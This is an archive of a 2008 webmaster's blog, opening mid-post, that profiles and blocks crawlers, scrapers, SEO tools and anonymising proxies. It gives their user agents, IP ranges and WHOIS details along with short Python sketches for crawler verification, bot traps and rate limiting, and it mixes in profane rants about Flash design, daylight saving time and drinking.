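A pile of hits from one user agent is a decent hint that something lower-cased the URLs before the crawl started.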

Don't know, don't care, it's amusing either way.

Good luck with Project Rialto, you're going to need it.

Wednesday, April 09, 2008

Radian6's R6_FeedFetcher Fetching More Than Feeds

For those of you unfamiliar with Radian6 it's a "social media monitoring tool" because apparently everyone with an opinion on the internet needs someone to spy on their ass since we're disruptive.

Well bummer.

Isn't it a shame the good old days are gone where companies told you everything you needed to know about their brand and you had to be a journalist just to get your opinion heard?

Of course those so-called journalists never gave you their real opinion because of fear of losing advertisers so it was all candy coated bullshit that just bordered on the truth because advertisers couldn't handle the truth fearing nobody would buy their shit.

Tough shit and god bless the great equalizer called the Internet that leveled the playing field between consumers and companies so we can find out what's really going on without everything being filtered through the company spin doctor.

Their crawler details are:

142.166.3.122 "R6_FeedFetcher(www.radian6.com/crawler)"
The amusing thing about the R6_FeedFetcher is I never see it fetching the feed, instead it's trying to fetch pages linked from the feed, which is what we call a crawler and not a fucking feed fetcher.

Does it read robots.txt to see if it's allowed beyond my RSS feed?

Fuck no.

I looked at all accesses on my RSS feed and didn't see anything obvious so maybe they get RSS feeds from FeedBurner or something similar, who knows.

Anyway, it's blocked now on my other site so I can be as disruptive as I want there.

However, who wants to place bets that this disruptive post will be monitored?


P.S. The site R6_FeedFetcher is blocked on is not this blog for first time readers ;)

Update:

After doing some research it appears they also have the following user agent:
"R6_CommentReader(www.radian6.com/crawler)"
Also, read this interesting post about Radian6 on Simon's blog.

Friday, April 04, 2008

Discovery Engine's Discobot Discovered My Bot Blocker

I found this little Discobot from Discovery Engine trying to dance around on my server but the bot blocker bouncer at the door was already keeping him behind the velvet ropes.

Here's a sample of what I saw on my site:

208.96.54.74 "GET /robots.txt"
"Mozilla/5.0 (compatible; discobot/1.0; +http://discoveryengine.com/discobot.html)"

208.96.54.68
"Mozilla/5.0 (compatible; discobot/1.0; +http://discoveryengine.com/discobot.html)"
It does honor robots.txt just like they said it did but it cached it for about 48 hours between visits.

They were nice enough to provide the range of IPs it uses:
208.96.54.67 - 208.96.54.96
Those IPs are from Servepath which I already block.

Between whitelisting allowed bots and blocking more data centers than I'd care to admit, this poor little Discobot didn't stand a chance to discover anything.

Call back when you're all grown up and ready to send traffic.


Persaibot - The Rude Crawler

I saw this little Persaibot hit my site today without even looking at robots.txt and their website has the balls to say:

Persai uses this bot to crawl the web. It's probably the nicest bot with the greatest personality in the world. Seriously, give it some attention.
Exactly how nice can a bot be that doesn't read robots.txt?

Did you read it and cache it some other day?

Doesn't matter, that was more than 24 hours ago, read it again.

I checked my logs from yesterday, it didn't read it then either and Persai hadn't visited my site in about a month before that.

I'm sorry, you have made the huge faux pas in robot rudeness.

Here's the intel I have on this little bot:
71.204.131.68 [c-71-204-131-68.hsd1.ca.comcast.net]
"PersaiBot/2.1-dev3a (Persai web crawler; http://www.persai.com/bot.html; bot at persai dot com)"

67.202.55.205 [ec2-67-202-55-205.compute-1.amazonaws.com]
"Mozilla/5.0 (compatible; Persaibot/2.71828183; +http://www.persai.com/bot.html)"

76.102.193.127 [c-76-102-193-127.hsd1.ca.comcast.net]
"Mozilla/5.0 (compatible; Persaibot/2.71828183; +http://www.persai.com/bot.html)"
Now the true irony here is that the CEO of Persai posted on his blog complaining about another search engine called Spock scraping every little bit of data about him but at least Spock claims to honor robots.txt.

Must be a karma thing ;)

DART Agent - Another Annoying Distributed Tool

This little annoying DART thing that keeps bouncing off my web site appears to be written by CRS4, the Center for Advanced Studies, Research and Development in Sardinia.

It would appear DART stands for "Distributed Agent-based Retrieval Tools" and they even have a workshop in '06 about this damn thing touted as "The Future of Search Engines' Technologies" that had people from Yahoo!, Google, Quaero and Ask attending.

Here's a sample of some IPs it operates from and the shitload of versions this thing has:

212.123.91.18 "DART Agent, version 1.2 (build 14062007)"
212.123.91.78 "DART Agent, version 1.2.7 (build 27062007)"
212.123.91.78 "DART Agent, version 1.4 (build 17102007)"
156.148.18.62 "DART Agent, version 1.4 (build 29102007)"
156.148.18.62 "DART Agent, version 1.4.1 (build 05112007)"
156.148.18.62 "DART Agent, version 1.4.2 (build 08112007)"
212.123.91.78 "DART Agent, version 1.4.3 (build 15112007)"
212.123.91.78 "DART Agent, version 1.4.3 (build 19112007)"
212.123.91.78 "DART Agent, version 1.4.4 (build 05122007)"
212.123.91.78 "DART Agent, version 1.4.5 (build 06122007)"
212.123.91.78 "DART Agent, version 1.4.6 (build 14012008)"
156.148.18.62 "DART Agent, version 1.4.6 (build 14012008)"
212.123.91.78 "DART Agent, version 1.4.7 (build 24012008)"
212.123.91.78 "DART Agent, version 1.4.8 (build 04022008)"
212.123.91.78 "DART Agent, version 1.5 (build 08022008)"
212.123.91.78 "DART Agent, version 1.5.1 (build 14022008)"
212.123.91.78 "DART Agent, version 1.5.2 (build 18022008)"
212.123.91.78 "DART Agent, version 1.5.5 (build 27022008)"
156.148.18.62 "DART Agent, version 1.5.6 (build 28022008)"
212.123.91.78 "DART Agent, version 1.5.6 (build 28022008)"
212.123.91.78 "DART Agent, version 1.5.1 (build 14022008)"
212.123.91.78 "DART Agent, version 1.5.7 (build 05032008)"
82.85.70.40 "DART Agent, version 1.5.2 (build 18022008)"
212.123.91.78 "DART Agent, version 1.5.8 (build 06032008)"
156.148.18.62 "DART Agent, version 1.5.8 (build 06032008)"
82.85.70.42 "DART Agent, version 1.5.8 (build 06032008)"
212.123.91.78 "DART Agent, version 1.5.9 (build 19032008)"
212.123.91.78 "DART Agent, version 1.5.8 (build 06032008)"
212.123.91.78 "DART Agent, version 1.5.9 (build 20032008)"
213.205.44.51 "DART Agent, version 1.5.8 (build 06032008)"
213.205.44.52 "DART Agent, version 1.5.8 (build 06032008)"
212.123.91.78 "DART Agent, version 1.6 (build 02042008)"
213.205.44.52 "DART Agent, version 1.5.8 (build 06032008)"
156.148.18.62 "DART Agent, version 1.6.0 (build 02042008)"
Looks like so far it's only operating out of Italy. They're nice enough to provide reverse DNS when it operates off their own servers, such as "dartcn01.crs4.it", and even from another source, "dart02.itsm.tiscali.com", so the crawler can be verified there. Other sources, such as "82-85-70-40.b2b.tiscali.it", can't be verified, so it's going to be a problem child for anyone that wants to let it play but make sure it's not being spoofed.
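For anyone who does want to let it play, the usual way to verify a crawler is a forward-confirmed reverse DNS check. You look up the host name for the IP, make sure it sits under a domain you trust, then resolve that name forward and confirm it points back at the same IP. Here's a minimal Python sketch of that idea. The function name, the suffix list you pass in, and the injectable resolver arguments are my own assumptions for illustration.

```python
import socket


def verify_crawler_ip(ip, allowed_suffixes, reverse=None, forward=None):
    """Forward-confirmed reverse DNS check for a single IP address."""
    # Resolvers are injectable so the logic can be tried without a network.
    reverse = reverse or (lambda addr: socket.gethostbyaddr(addr)[0])
    forward = forward or (lambda name: socket.gethostbyname_ex(name)[2])
    try:
        host = reverse(ip).rstrip(".").lower()
    except OSError:
        return False  # no reverse DNS at all
    # The host name must be the trusted domain itself or a name underneath it.
    if not any(host == s or host.endswith("." + s) for s in allowed_suffixes):
        return False
    try:
        # The forward lookup must point back at the IP we started with.
        return ip in forward(host)
    except OSError:
        return False
```

Calling verify_crawler_ip(ip, ["crs4.it"]) would only pass hits whose reverse DNS lands under crs4.it and resolves back to the same address. Generic ISP names like the b2b.tiscali.it one fail the suffix test, which is exactly the problem described above.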

Just what the web needs, more distributed web technology to bug the fuck out of webmasters just trying to scratch out a living on the internet.

Oh well, it can't play on my server so what the hell do I care anyway!


Saturday, March 29, 2008

WHO is Scraping My Site!

Note the lack of a question mark in the title because this wasn't a question about "WHO?" but an actual statement about "WHO!" and by that I mean the WHO as in an office of the World Health Organization.

It registered 411 page requests from 203.94.76.59 which is a non-portable address assigned to the WHO Representative Office in Sri Lanka.

Here's the IP and UA:

203.94.76.59
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Here's the WHOIS:
inetnum: 203.94.76.56 - 203.94.76.63
netname: WHO-SLT-LK
country: LK
descr: WHO Representative Office
descr: 385, Health Inform. Centre, Suwasiripaya, Deens Road, Colombo-10
admin-c: NS198-AP
tech-c: NS198-AP
status: ASSIGNED NON-PORTABLE
mnt-by: MNT-SLT-LK
source: APNIC

person: Network Administrator SLTNet
nic-hdl: NS198-AP
address: Sri Lanka
country: LK
mnt-by: MNT-SLT-LK
source: APNIC
It pretended to be a human browser like so many of them do these days by pulling all the images from the index page and then it took off ripping pages like a bandit.

It wasn't even a smart bot as the first link it hit off the index page was my bot trap which is easily flagged and avoidable in the robots.txt as a no crawl zone, so it definitely wasn't human.

Of course the robots.txt file is my other bot trap but what the hell.
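The bot trap idea is simple enough to sketch in a few lines of Python. This is a rough illustration and not the code running on my server: any IP that requests a path robots.txt told crawlers to stay out of gets flagged, and flagged IPs are refused from then on. The class name and the "/trap/" prefix are hypothetical.

```python
class BotTrap:
    """Remember every IP that requests a path robots.txt marked as off limits."""

    def __init__(self, trap_prefixes):
        self.trap_prefixes = tuple(trap_prefixes)
        self.flagged = set()

    def allow(self, ip, path):
        """Return False for flagged IPs, flagging the IP first if it walks into a trap."""
        if path.startswith(self.trap_prefixes):
            self.flagged.add(ip)
        return ip not in self.flagged


if __name__ == "__main__":
    trap = BotTrap(["/trap/"])  # hypothetical no-crawl zone
    print(trap.allow("203.94.76.59", "/trap/page1.html"))
    print(trap.allow("203.94.76.59", "/index.html"))
```

A human never sees the trap link and a polite bot skips it because of robots.txt, so whatever lands there has pretty much identified itself.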

Then it went screaming along asking for the next 409 pages at 2-3 pages a second.
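Speed alone gives this kind of thing away. Here's a minimal sliding-window sketch in Python that flags an IP once it makes more than a set number of page requests inside a short window. The class name and the defaults (10 hits in 5 seconds) are assumptions picked for illustration, so tune them to your own traffic.

```python
from collections import defaultdict, deque


class RateWatch:
    """Flag an IP that makes more than max_hits requests within window seconds."""

    def __init__(self, max_hits=10, window=5.0):
        self.max_hits = max_hits
        self.window = window
        self.hits = defaultdict(deque)

    def too_fast(self, ip, now):
        """Record one request at time now (in seconds) and report if the IP is over the limit."""
        recent = self.hits[ip]
        recent.append(now)
        # Drop timestamps that have slid out of the window.
        while recent and now - recent[0] > self.window:
            recent.popleft()
        return len(recent) > self.max_hits
```

At 3 pages a second a bot piles up 15 requests in any 5 second window, so it trips the default limit a few seconds in, while somebody actually reading the pages never gets close.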

It would appear that WHO should check out the health of their computer network as something is rotten in their offices in Sri Lanka.

Friday, March 28, 2008

REBI-Shoveler Digging for Korean Search Engine

REBI-Shoveler must be easily overlooked as it's very unusual to go to a search engine and type in the user agent and get no authoritative hit from any bot hunter whatsoever. There were tons of hits from various web stat pages but nothing I could easily find that gave me any clue what in the hell this thing was.

With this little information all I knew was it came from Korea, otherwise I was stumped:

116.122.36.150 "REBI-Shoveler v0.1"
Finally I decided to see if I could find any more clues in the several years of bot tracking archive files I keep and sure enough, there was a single original hit on my server that contained the answer I was looking for:
116.122.36.48
"REBI-Shoveler/RS Ver. -100.0 (REBI's great worker ... ; http://rebi.co.kr; deisys@rebi.co.kr)"
This bot operates out of multiple IPs in the range of 116.122.36.* and here's a little translation for you from their site about REBI. There's no mention of robots.txt there, nor did the bot ask for the file when it visited my site today, so it's behaving badly.

Now you know who REBI is that's shoveling shit off of your server.

Enjoy.

We'll Have Anon Of That, John Doe Must Go

Looks like JonDonym - the internet anonymisation service is actively operating as those little anonymous hits are coming from their servers.

I have a couple of actual scrapes happening from their IPs, who would suspect abuse of anon proxies, right?

Here's a couple of examples of activity:

141.76.45.34 [proxy1.anon-online.org.]
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13

141.76.45.35 [proxy2.anon-online.org.]
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13

Don't know what other IPs it operates from but 141.76.45.* and anything resolving to anon-online.org are blocked for now.
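That block boils down to two tests: is the IP inside 141.76.45.*, or does its reverse DNS name fall under anon-online.org? A minimal Python sketch using the standard ipaddress module follows. The function name is mine, and the caller is assumed to have already looked up the reverse DNS name.

```python
import ipaddress

BLOCKED_NET = ipaddress.ip_network("141.76.45.0/24")  # same as 141.76.45.*
BLOCKED_DOMAIN = "anon-online.org"


def is_blocked(ip, reverse_host=""):
    """True if the IP is in the blocked /24 or its reverse DNS name is under the blocked domain."""
    if ipaddress.ip_address(ip) in BLOCKED_NET:
        return True
    host = reverse_host.rstrip(".").lower()
    # Match the domain itself or any name below it, but not look-alikes.
    return host == BLOCKED_DOMAIN or host.endswith("." + BLOCKED_DOMAIN)
```

The domain test is there to catch proxies that show up later on IPs outside the /24.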

Good luck with your John Doe anonymity while I work on my taxes as you've just been H&R Blocked!

With tax deadlines close at hand I couldn't resist ;)

Monday, March 24, 2008

Please Install Flash - Idiots Guide To Flash Web Stupidity

Time to rant about a big pet peeve of mine, that little line of javascript that detects whether or not Flash is installed and the stupid shit developers do when it fails.

For a little introduction to the problem, I run Firefox with NoScript enabled globally for security purposes. However, I can easily enable javascript with a click except some developers do some really stupid shit that's costing their clients visitors.

Here's a few brain dead examples of Flash sites done wrong in the hands of idiots:

1. When javascript is disabled a blank page often results without even a hint, looks broken, visitors go away thinking you're stupid as dirt for putting up a blank page.

2. Redirecting visitors to a "Please Download Flash" page is just asinine. When visitors then enable javascript so your flash will work we're off on some other stupid page instead of where we wanted to go. Yup, frustrate your visitors and they'll just go elsewhere where sites aren't developed by designers that rode the short yellow bus to VoTech.

3. Using the NOSCRIPT tag to incorrectly tell us we don't have Flash installed because that tag actually means we have javascript disabled and you have no fucking clue if we have Flash installed or not until we turn on javascript you fucking idiots. Tell us correctly to ENABLE JAVASCRIPT to run the site in your NOSCRIPT tag and then let the javascript tell us we don't have Flash installed.

I'm sure I'll have some other addendums later but these are the top 3 offending things moronic Flash site developers do off the top of my head.

Anyone else got a pet Flash peeve?

Friday, March 14, 2008

SearchMe Demos Wicked Cool Visual Search Engine

Looks like I was right on the money back in Oct '07 when I announced that I had spotted SearchMe taking screen shots on one of my sites and I knew this was a hot news item but couldn't get the Sphinners to bite on it.

Here we are 6 months later and the story broke a couple of days ago on the Silicon Valley WebGuild:

Searchme is a new search engine that captures images of web pages and allows users to navigate visually through these page snapshots.
Searchme is currently running a private beta but the flash demo on their web site is real fucking cool so I hope their search technology is as good because this is so wicked it could be a real Google killer.



I'll bet Microsoft, Yahoo or Ask tries to buy this technology ASAP before Google can get their hands on it as something this hot could put any of the lesser search engines back on the map.

If you want information about their spider named Charlotte and IP addresses so you can let Searchme into your site and past your firewall, read my previous post with all the pertinent information.

Wednesday, March 12, 2008

Welcome to Opt-In Web 3.0 Politeness


Sunday, March 09, 2008

Gone Fishkin With More SEOMoz Tool Activity

In my continuing series of exposing SEO tools we find this little SEOmoz-bot over at SEOmoz.

I'll give SEOmoz some credit where credit is due in that they at least identify their tool as a bot so it can be blocked if you want. However, they don't check robots.txt to see if the bot is allowed, as I think they assume it's always going to be used by the site owner, but it could just as easily be used on some competitor's site as well.

Here are the IPs and the user agent used:

209.40.115.202 "SEOmoz-bot"
209.40.116.200 "SEOmoz-bot"
The IPs belong to HopOne, which provides various services including hosting.
OrgName: HopOne Internet Corporation
NetName: HOPONE-DCA2-4
NetRange: 209.40.96.0 - 209.40.127.255
I think that range is safe to block as it appears they use 'DC' in the net name of their data centers but it's probably worth checking to see what bounces for a few days to make sure.
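Most firewalls and block lists want CIDR notation and not a start and end address, so here's a small Python sketch that converts a WHOIS NetRange using the standard ipaddress module. The function name is made up for illustration.

```python
import ipaddress


def range_to_cidrs(first, last):
    """Convert an inclusive IP range into the shortest list of CIDR blocks."""
    networks = ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last)
    )
    return [str(net) for net in networks]


if __name__ == "__main__":
    # The HopOne NetRange quoted above.
    print(range_to_cidrs("209.40.96.0", "209.40.127.255"))
```

The HopOne range collapses to a single block, 209.40.96.0/19. Ranges that don't start and end on neat boundaries come back as several smaller blocks.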

Of course the best SEO is secure SEO, so block 'em ;)

Smack the SMILE SEO TOOLS Off Your Face

Some spamming assholes in Russia think automatic directory submission is the same as SEO and added one of my sites to their so called SMILE SEO TOOLS.

Here's a list of the various user agents I've seen claiming to be this tool:

"SMILESEOTools"
"SMILE SEO Tools"
"SMILESEOTools(Windows;compatible;MSIE6.0;I;WindowsNT5.0)"
The last user agent with an extremely lame ass attempt to mimic MSIE 6 gave me a good giggle.

Here's the list of IPs using this directory spamware. My guess is they're mostly proxy sites in Russia, as they have a ton of proxy sites for spamming over there.

Yes, 114 lovely IPs using SMILE SEO Tools for your viewing pleasure:
217.20.168.113
217.151.225.42
213.247.143.205
213.232.196.102
213.184.238.34
213.170.69.66
212.96.222.197
212.96.200.33
212.96.200.115
212.59.98.125
212.220.104.230
204.15.76.250
201.12.176.18
195.91.168.193
195.72.145.7
195.72.142.106
195.46.188.3
195.239.202.65
195.234.114.122
195.234.109.71
195.218.220.26
195.162.39.54
195.131.84.202
195.131.188.138
195.122.250.205
194.44.191.7
194.24.240.23
193.239.255.22
193.238.96.5
193.17.174.7
91.77.38.45
91.76.44.134
91.76.34.0
91.76.159.205
91.76.156.161
91.76.111.247
91.76.108.170
91.124.75.182
91.124.35.208
91.124.245.129
91.124.232.195
91.124.165.97
91.124.143.254
91.122.51.213
90.188.71.41
89.250.2.129
89.19.164.14
89.179.97.170
89.179.96.253
89.179.110.182
89.179.103.190
89.178.209.180
89.178.143.161
87.240.15.33
87.240.15.26
87.237.113.6
87.117.35.56
87.117.33.5
86.57.220.142
85.94.34.227
85.238.106.44
85.238.106.35
85.236.26.202
85.192.165.43
85.141.228.16
85.141.213.13
85.140.58.175
85.140.54.95
85.140.53.21
85.140.52.233
85.140.154.97
85.140.118.4
85.140.117.215
85.140.116.105
84.42.57.72
84.253.75.67
84.154.102.78
83.237.96.4
83.237.76.106
83.237.211.116
83.237.200.54
83.237.186.74
83.237.169.118
83.167.116.85
83.167.112.224
82.207.36.70
82.207.14.51
82.207.117.186
82.207.0.248
81.95.178.185
81.94.22.114
81.3.158.138
81.25.53.49
81.200.7.88
80.92.96.7
80.80.111.240
80.248.156.79
78.106.58.185
78.106.189.47
77.247.172.250
77.247.165.196
77.247.165.14
77.247.160.89
77.239.192.6
77.235.113.131
77.235.101.11
77.123.62.125
77.122.231.9
74.232.4.137
62.33.7.146
62.213.18.70
62.168.234.78
62.140.244.20
62.118.2.146
Just to help you understand where these IPs were coming from, here's the reverse DNS of the same list:
ppp91-77-38-45.pppoe.mtu-net.ru.
ppp91-76-44-134.pppoe.mtu-net.ru.
ppp91-76-34-0.pppoe.mtu-net.ru.
ppp91-76-159-205.pppoe.mtu-net.ru.
ppp91-76-156-161.pppoe.mtu-net.ru.
ppp91-76-111-247.pppoe.mtu-net.ru.
ppp91-76-108-170.pppoe.mtu-net.ru.
182-75-124-91.pool.ukrtel.net.
208-35-124-91.pool.ukrtel.net.
129-245-124-91.pool.ukrtel.net.
195-232-124-91.pool.ukrtel.net.
97-165-124-91.pool.ukrtel.net.
254-143-124-91.pool.ukrtel.net.
ppp91-122-51-213.pppoe.avangarddsl.ru.
41.71.188.90.adsl.tomsknet.ru.
nat.tushino.com.
hst14-nat.n.tc-exe.ru.
89-179-97-170.broadband.corbina.ru.
89-179-96-253.broadband.corbina.ru.
89-179-110-182.broadband.corbina.ru.
89-179-103-190.broadband.corbina.ru.
89-178-209-180.broadband.corbina.ru.
89-178-143-161.broadband.corbina.ru.
nat.a10.qwerty.ru.
nat1.a3.qwerty.ru.
6-113.admiral.tvoe.tv.
Host 56.35.117.87.in-addr.arpa not found: 3(NXDOMAIN)
5.33.117.87.donpac.ru.
220-142.pppoe.vitebsk.by.
85.94.34.227.adsl.sta.mcn.ru.
85-238-106-44.broadband.tenet.odessa.ua.
85-238-106-35.broadband.tenet.odessa.ua.
Host 202.26.236.85.in-addr.arpa not found: 3(NXDOMAIN)
85-192-165-43.dsl.esoo.ru.
ppp85-141-228-16.pppoe.mtu-net.ru.
ppp85-141-213-13.pppoe.mtu-net.ru.
ppp85-140-58-175.pppoe.mtu-net.ru.
ppp85-140-54-95.pppoe.mtu-net.ru.
ppp85-140-53-21.pppoe.mtu-net.ru.
ppp85-140-52-233.pppoe.mtu-net.ru.
ppp85-140-154-97.pppoe.mtu-net.ru.
ppp85-140-118-4.pppoe.mtu-net.ru.
ppp85-140-117-215.pppoe.mtu-net.ru.
ppp85-140-116-105.pppoe.mtu-net.ru.
Host 72.57.42.84.in-addr.arpa not found: 3(NXDOMAIN)
client1-3.amtelsvyaz.ru.
p549A664E.dip.t-dialin.net.
ppp83-237-96-4.pppoe.mtu-net.ru.
all-seminars.ru.
ppp83-237-211-116.pppoe.mtu-net.ru.
ppp83-237-200-54.pppoe.mtu-net.ru.
ppp83-237-186-74.pppoe.mtu-net.ru.
ppp83-237-169-118.pppoe.mtu-net.ru.
n116h85.catv.ext.ru.
n112h224.catv.ext.ru.
Host 70.36.207.82.in-addr.arpa not found: 3(NXDOMAIN)
pool-2user51.dc.ukrtel.net.
us.com.ua.
Host 248.0.207.82.in-addr.arpa not found: 3(NXDOMAIN)
185.178.95.81.in-addr.arpa turnskin.kiev.ua.
185.178.95.81.in-addr.arpa werewolf.kiev.ua.
185.178.95.81.in-addr.arpa filippova.kiev.ua.
185.178.95.81.in-addr.arpa rogovskiy.kiev.ua.
185.178.95.81.in-addr.arpa rogovskaya.kiev.ua.
185.178.95.81.in-addr.arpa prudaev.kiev.ua.
185.178.95.81.in-addr.arpa filippov.kiev.ua.
114.22.94.81.in-addr.arpa vpnpool-81-94-22-114.users.mns.ru.
Host 138.158.3.81.in-addr.arpa not found: 3(NXDOMAIN)
49.53.25.81.in-addr.arpa NAT-81-25-53-49.ultranet.ru.
Host 88.7.200.81.in-addr.arpa not found: 2(SERVFAIL)
7.96.92.80.in-addr.arpa gw7.eth.zelcom.ru.
240.111.80.80.in-addr.arpa ce2-ats32.aaanet.ru.
Host 79.156.248.80.in-addr.arpa not found: 3(NXDOMAIN)
185.58.106.78.in-addr.arpa 78-106-58-185.broadband.corbina.ru.
47.189.106.78.in-addr.arpa 78-106-189-47.broadband.corbina.ru.
Host 250.172.247.77.in-addr.arpa not found: 3(NXDOMAIN)
Host 196.165.247.77.in-addr.arpa not found: 3(NXDOMAIN)
Host 14.165.247.77.in-addr.arpa not found: 3(NXDOMAIN)
Host 89.160.247.77.in-addr.arpa not found: 3(NXDOMAIN)
6.192.239.77.in-addr.arpa libra.comintel.ru.
131.113.235.77.in-addr.arpa 131.113.235.77.dyn.idknet.com.
11.101.235.77.in-addr.arpa 11.101.235.77.dyn.idknet.com.
125.62.123.77.in-addr.arpa unshaven.yawner.volia.net.
9.231.122.77.in-addr.arpa gearing.butter.volia.net.
137.4.232.74.in-addr.arpa adsl-232-4-137.asm.bellsouth.net.
146.7.33.62.in-addr.arpa gw.quaynet.ru.
70.18.213.62.in-addr.arpa h62-213-18-70.ip.syzran.ru.
78.234.168.62.in-addr.arpa virtual-234-78.utk.ru.
20.244.140.62.in-addr.arpa nat3.birulevo.net.
Host 146.2.118.62.in-addr.arpa not found: 3(NXDOMAIN)
113.168.20.217.in-addr.arpa mediainfotour-gw.cs1-nan.kv.wnet.ua.
;; reply from unexpected source: 72.51.32.76#53, expected 72.51.32.92#53
;; Warning: ID mismatch: expected ID 10615, got 39356
;; reply from unexpected source: 72.51.32.76#53, expected 72.51.32.92#53
;; Warning: ID mismatch: expected ID 10615, got 39356
;; connection timed out; no servers could be reached
205.143.247.213.in-addr.arpa is an alias for 205.192.143.247.213.in-addr.arpa.
205.192.143.247.213.in-addr.arpa host-205.SPM.213.247.143.192.0xfffffff0.macomnet.net.
102.196.232.213.in-addr.arpa host.hnt.ru.
34.238.184.213.in-addr.arpa 34-nat.cosmostv.by.
66.69.170.213.in-addr.arpa relay.volex.spb.ru.
Host 197.222.96.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 33.200.96.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 115.200.96.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 125.98.59.212.in-addr.arpa not found: 3(NXDOMAIN)
Host 230.104.220.212.in-addr.arpa not found: 3(NXDOMAIN)
250.76.15.204.in-addr.arpa elanora.aatikah.com.
18.176.12.201.in-addr.arpa 201-12-176-18.intelignet.com.br.
193.168.91.195.in-addr.arpa h195-91-168-193.ln.rinet.ru.
7.145.72.195.in-addr.arpa user-195.72.145.7.lvivnet.org.
106.142.72.195.in-addr.arpa gw.itstime.ru.
3.188.46.195.in-addr.arpa ts1-b3.Irkutsk.dial.rol.ru.
65.202.239.195.in-addr.arpa ts1-a65.Irkutsk.dial.rol.ru.
122.114.234.195.in-addr.arpa 195.234.114.122.ukrlink.net.ua.
;; connection timed out; no servers could be reached
26.220.218.195.in-addr.arpa adsl-stat-0534.comch.ru.
Host 54.39.162.195.in-addr.arpa not found: 3(NXDOMAIN)
202.84.131.195.in-addr.arpa cache.wplus.net.
Host 138.188.131.195.in-addr.arpa not found: 3(NXDOMAIN)
205.250.122.195.in-addr.arpa 205.250.nat.smilenet.sandy.ru.
7.191.44.194.in-addr.arpa mail2.complex.lviv.ua.
23.240.24.194.in-addr.arpa 23.240.dsl.westcall.net.
Host 22.255.239.193.in-addr.arpa not found: 3(NXDOMAIN)
5.96.238.193.in-addr.arpa nat.itt.net.ua.
7.174.17.193.in-addr.arpa pptp-out2.radiokom.kr.ua
Well, doesn't that really sum it up well?

Enjoy the list, block 'em if you want.
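One note on reading that reverse DNS dump: the entries ending in in-addr.arpa carry the IP with its four octets in reverse order, so "185.178.95.81.in-addr.arpa" is 81.95.178.185. A tiny Python sketch for flipping them back so they can be matched against the IP list. The function name is hypothetical and it only handles IPv4.

```python
import ipaddress


def arpa_to_ip(name):
    """Turn an IPv4 in-addr.arpa name back into the dotted IP address."""
    labels = name.rstrip(".").lower().split(".")
    if len(labels) != 6 or labels[-2:] != ["in-addr", "arpa"]:
        raise ValueError("not an IPv4 in-addr.arpa name: " + name)
    # The first four labels are the octets in reverse order.
    return str(ipaddress.ip_address(".".join(reversed(labels[:4]))))


if __name__ == "__main__":
    print(arpa_to_ip("185.178.95.81.in-addr.arpa"))
```

Going the other way, ipaddress.ip_address("81.95.178.185").reverse_pointer gives the in-addr.arpa name.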

Heck, just block Russia and the Ukraine entirely and hide the children in your bomb shelter just in case they get pissed.

More Pesky SEO Tools To Block

Seems there is something in Germany called SEO.AG that has been pestering my site for quite some time.

The IP and User Agent it uses is:

85.214.35.2 "SEO[.AG] - Search Engine Optimizer Bot [http://www.seo.ag]"
However, they also run a web proxy on 85.214.35.2 so you have to block the IP to stop all the nonsense.

I'm not sure which is worse, the scrapers, proxies, aggregators, or the SEOs and their tools.

You Know You Drink Too Much When...

When you wake up face down in a pizza you know you got mad drinking skills, especially when you went face down in mid-bite of the pizza.

When you wake up and your pillow is covered in pizza vomit, that's madder skills cause you didn't die in your sleep aspirating on pizza vomit. Having to shave your beard off because you can't seem to wash out all the partially digested bits of pizza is a bit embarrassing. However, having the side of your face that laid on the pizza sauce all night get stained and looking bright red all day is priceless.

When you wake up under your bed, realize you're on cold hard wood, bump your head on wood when you try to get up and suddenly panic thinking you're in a coffin because it's all wood and you can't get up, you've truly arrived.

When leaving a party and the elevator makes your stomach flip-flop, you panic as the doors open and vomit down the crack between the elevator and the wall and spew into the elevator shaft just because there's nowhere else to suddenly yak, you're working your way to be an AA superstar!

When you're leaving a party and have no other place than to barf in a water fountain in the lobby of an apartment complex and as you're leaving giggle as you hear people walk up to take a drink screaming, you're in the club!

When you barf up brightly colored red nacho chips and suddenly panic thinking your stomach is bleeding profusely until you remember what you ate .... and then drink too much and barf a couple of nights later just to make sure that's what it really was.

When you and your friends are out partying all night and you suddenly fill up the floor of the car with vomit and 6 of your friends bail out the window just to get away from you

You know your friends are all alkies too when the topic of conversation is always which one of you wussies is going to drop a street pizza or a technicolor yawn first

Another clue your friends have drinking problems is when they fall out of the car when they open the door

A clue something bad happened is when you wake up on a sofa in a house you don't remember, find your glasses in your pocket and when you put them on can't see thru the thick film of dry vomit that's encrusted them

FINALLY, last but not least, you know it's time to stop drinking when you wake up and flies are picking the vomit out of your nose.

What Time Is It Anyway?

Got up this morning and all the computers and TV's said it was 9:00am but the phones and alarm clocks said it was 8:00am.

Obviously this was the daylight savings bullshit gone bad but how in the hell could someone fuck up the atomic time clock which the alarms and phones feed from?

Had this been an actual day when I really needed to get up and be somewhere by 8am I would've been fucked since both the alarm clock and the alarm in the phone, which I prefer because it's louder, would've both malfunctioned.

Anyway, around 11:00am everything was back in synch.

Don't you just love fucking daylight savings time?

Blech.

There Goes the Bad Neighborhood

Isn't it ironic that a day after I wrote about stopping snooping SEO tools, here comes one of them trying to crawl one of my websites?

The user agent and IP address are:

208.77.208.198 [emeraldarborvitae.viviotech.net.]
"Bad-Neighborhood Link Analyzer (http://www.bad-neighborhood.com/)"
They were automatically blocked on my site because I white list only allowed user agents and they use an unauthorized user agent name, but they could always switch to mimic a browser so in the long run it's best to block the IP range.

Turns out Viviotech is the host of Bad Neighborhood's site:
OrgName: Vivio Technologies
NetRange: 208.77.208.0 - 208.77.211.255
CIDR: 208.77.208.0/22
After you block this data center range the tools from Bad Neighborhood can't be used to scan your site, check your Apache server headers, or any other thing.

Sorry, but you're not allowed back into my neighborhood.

Buh bye.

Saturday, March 08, 2008

Jayde NicheBot Crawls for iEntry's Web of Sites

Who out there remembers the Jayde directory?

Some of us submitted our sites to Jayde way back in '96 or '97, who knows exactly, and now our sites are being hit by something called the "Jayde NicheBot".

"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) Jayde NicheBot"
